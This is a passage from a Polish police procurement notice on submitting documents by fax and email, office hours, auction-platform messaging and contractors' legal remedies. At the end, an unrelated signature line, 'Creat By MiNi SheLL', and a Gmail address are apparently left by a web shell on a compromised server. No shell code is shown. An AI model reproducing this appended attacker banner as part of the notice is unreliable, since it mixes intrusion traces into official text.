tego skutki. Zamawiający nie wymaga potwierdzenia otrzymania przekazywanego pisma drogą
elektroniczną. W przypadku wyboru przez Wykonawcę jako drogi otrzymywania pism nadawanych
przez Zamawiającego drogą faksową Wykonawca ponosi odpowiedzialność za sprawdzenie
kompletności i czytelności otrzymania przesłanego pisma. Brak kompletności lub czytelności
Wykonawca niezwłocznie zgłasza Zamawiającemu telefonicznie na nr 32 200-20-50. Za dowód
skutecznego przesłania pisma do Wykonawcy drogą faksową Zamawiający uznaje potwierdzenie
przesłania faksowego OK na numer podany przez Wykonawcę na formularzu ofertowym i
wykazany na potwierdzeniu faksowym. Zamawiający nie wymaga potwierdzenia otrzymania
przekazywanego pisma drogą faksową. Wykonawca zobowiązany jest do powiadomienia
Zamawiającego w przypadku zmiany numeru telefonu, faksu lub adresu poczty elektronicznej, na
który Zamawiający ma przesyłać pisma. W przypadku nie dokonania powiadomienia
Zamawiającego, przesłanie pisma na numer faksu lub adres poczty elektronicznej wskazany na
wniosku zgodnie z zasadami wskazanymi w niniejszym punkcie uważa się za skutecznie dokonane.
Zaproszenia do udziału w licytacji zostaną przekazane faxem i potwierdzone pocztą. 3. Przesyłanie
wszelkich informacji, oświadczeń, zaświadczeń drogą faksową i elektroniczną może odbywać się
tylko w dniach urzędowania Komendy (od poniedziałku do piątku w godzinach 7.30-15.30) na
numer 032 200 20 60 lub e-mail: zamowienia@ka.policja.gov.pl. UWAGA: W przypadku
przesłania dokumentu po godzinie 15.30 w dniu roboczym spowoduje, iż zostanie on
zarejestrowany u Zamawiającego jako złożony w następnym dniu roboczym. W przypadku
przesłania dokumentu w dniu wolnym od pracy zostanie on zarejestrowany u Zamawiającego jako
złożony w pierwszym następującym dniu roboczym. fax. 032 2002060, e mail:
zamowienia@ka.policja.gov.pl 4. Od momentu otwarcia do momentu zamknięcia licytacji
Zamawiający i Wykonawcy wszelkiego rodzaju wnioski,oświadczenia i inne informacje przekazują
drogą elektroniczną za pośrednictwem platformy licytacyjnej; wiadomości przekazywane
Wykonawcom będą widoczne w zakładce moje wiadomości POUCZENIE O ŚRODKACH
OCHRONY PRAWNEJ PRZYSŁUGUJĄCYCH WYKONAWCY W TOKU POSTĘPOWANIA O
UDZIELENIE ZAMÓWIENIA. Wykonawcy w toku postępowania o udzielenie zamówienia
przysługują środki ochrony prawnej określone w dziale VI ustawy Prawo Zamówień Publicznych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com